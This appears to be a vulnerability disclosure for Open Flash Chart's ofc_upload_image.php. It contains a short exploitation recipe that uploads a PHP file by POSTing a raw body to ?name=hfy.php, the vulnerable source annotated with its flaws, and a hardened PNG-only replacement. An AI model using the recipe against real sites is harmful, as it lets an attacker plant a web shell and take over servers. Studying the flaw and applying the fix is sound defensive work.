POST data to the vulnerable file and it saves the request body under any file extension you choose
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php   (hfy.php is the file name the server will save under)
POST arbitrary data as the raw request body; it is written to the file verbatim
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is present in the latest version of wss, even in the paid edition; the demo deployed in the Sina store has it too.

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
// (a web-accessible directory, created world-writable)
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// basename() strips directory components, but the file name and its
// extension come straight from the attacker-controlled ?name= parameter
// with no validation at all
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
// ($HTTP_RAW_POST_DATA was removed in PHP 7; php://input replaces it)
//

// the raw request body is written to disk verbatim: no authentication,
// no size limit, no check that the content is actually a PNG
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
// (everything below is unreachable because of the exit() above)
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
  echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
  echo "FILE UPLOAD FAILED";
}

?>
Fix:
This vulnerable file is just a tragedy. How to fix it: add authorization checks, extension validation and the like. Do it yourself.
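The fix above in concrete form, as an added example written for this page and not code from Open Flash Chart or from the poster: a hardened replacement for ofc_upload_image.php that keeps the original request shape (?name=... plus a raw PNG body) but checks what the original never does: the caller is logged in, the body really is a PNG, the name on disk is chosen by the server with a fixed .png extension, and the file lands outside the web root. The session key user_id, the ofc-uploads directory two levels above the script, and the 5 MB cap are assumptions of this example; adjust them to your application.

```php
<?php
// Added example (not the Open Flash Chart project's code): a hardened
// replacement for ofc_upload_image.php. Same request shape as the original
// (?name=<file> plus a raw PNG body), but nothing from the client decides
// where or under what name the bytes are stored, and only a PNG is accepted.
// The session key 'user_id', the save directory and the size cap are
// assumptions for this example.

declare(strict_types=1);

session_start();

// 1. Authentication: only a logged-in user may store files.
//    'user_id' is a placeholder for whatever your application sets at login.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Store outside the web root so nothing saved here can ever be served or
//    executed by the web server, whatever its extension. Assumed path.
$save_dir = dirname(__DIR__, 2) . '/ofc-uploads';
if (!is_dir($save_dir) && !mkdir($save_dir, 0750, true)) {
    http_response_code(500);
    exit('cannot create upload directory');
}

// 3. Read the raw body with php://input ($HTTP_RAW_POST_DATA is gone in PHP 7+)
//    and cap its size before anything touches the disk. 5 MB is an assumption.
$max_bytes = 5 * 1024 * 1024;
$body = file_get_contents('php://input', false, null, 0, $max_bytes + 1);
if ($body === false || strlen($body) === 0 || strlen($body) > $max_bytes) {
    http_response_code(413);
    exit('bad size');
}

// 4. Content validation: the body must really be a PNG. Check the 8-byte
//    signature and let getimagesizefromstring() parse the header as well.
$png_magic = "\x89PNG\r\n\x1a\n";
$info = getimagesizefromstring($body);
if (strncmp($body, $png_magic, 8) !== 0 || $info === false || $info[2] !== IMAGETYPE_PNG) {
    http_response_code(415);
    exit('not a PNG');
}

// 5. Never use the client-supplied name on disk. The server picks a random
//    name with a fixed .png extension; a sanitised version of ?name= survives
//    only as a display label.
$label = (string) preg_replace('/[^A-Za-z0-9_-]/', '_',
    pathinfo($_GET['name'] ?? 'chart', PATHINFO_FILENAME));
$label = substr($label, 0, 64) ?: 'chart';
$stored = bin2hex(random_bytes(16)) . '.png';
$destination = $save_dir . '/' . $stored;

// 6. Exclusive create ('x') so an existing file is never overwritten, and
//    no execute bit on the result.
$fh = fopen($destination, 'x');
if ($fh === false) {
    http_response_code(500);
    exit('cannot create file');
}
fwrite($fh, $body);
fclose($fh);
chmod($destination, 0640);

// Return the server-chosen name; a separate authenticated handler can read
// the file back and serve it with a fixed image/png Content-Type.
header('Content-Type: text/plain');
echo "Saved {$label} as {$stored}";
```

To check a deployment, repeat the request from the exploitation section: ?name=hfy.php with a non-PNG body should now come back as HTTP 415 and nothing should appear under tmp-upload-images, while a genuine PNG is stored under a 32-hex-character name the client never chose. Storing outside the web root is the part that matters most: getimagesize() will happily accept a PNG that carries PHP code in a text chunk, so even a file that slips past the content check must never be somewhere the web server would execute it.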